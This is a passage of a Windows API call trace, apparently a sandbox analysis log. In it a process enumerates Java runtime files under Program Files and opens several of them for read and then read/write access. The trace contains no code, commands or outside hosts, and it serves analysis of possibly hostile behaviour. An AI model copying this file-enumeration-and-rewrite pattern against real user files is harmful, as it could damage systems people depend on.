lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.631] GetFileType (hFile=0x368) returned 0x1 [0093.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.631] CloseHandle (hObject=0x368) returned 1 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.632] AreFileApisANSI () returned 1 [0093.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0093.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll") returned 60 [0093.633] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750)) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0093.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.633] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="npjp2.dll", cAlternateFileName="")) returned 1 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0093.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0093.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0093.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.634] AreFileApisANSI () returned 1 [0093.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll", lpUsedDefaultChar=0x0) returned 57 [0093.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0093.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0093.634] AreFileApisANSI () returned 1 [0093.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0093.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0093.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 57 [0093.635] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.635] GetFileType (hFile=0x368) returned 0x1 [0093.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.635] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.636] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.636] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.636] CloseHandle (hObject=0x368) returned 1 [0093.636] AreFileApisANSI () returned 1 [0093.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0093.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0093.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 57 [0093.636] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.636] GetFileType (hFile=0x368) returned 0x1 [0093.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0093.636] CloseHandle (hObject=0x368) returned 1 [0093.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.637] AreFileApisANSI () returned 1 [0093.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0093.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0093.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 57 [0093.638] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39440)) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0093.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.638] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6ebe8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x70, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\p", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓鑀\x03⺊Āgr먤聤̓㑍Ā̓蕐\x07̓뻌聤鑀\x03鑀\x03.8.0_144\\bin\\plugin2\\npjp2.dll")) returned 0 [0093.638] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0093.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0093.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0093.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0093.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0093.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.639] AreFileApisANSI () returned 1 [0093.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe", lpUsedDefaultChar=0x0) returned 54 [0093.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0093.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0093.639] AreFileApisANSI () returned 1 [0093.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75e40 [0093.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 54 [0093.639] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.639] GetFileType (hFile=0x360) returned 0x1 [0093.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0093.640] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 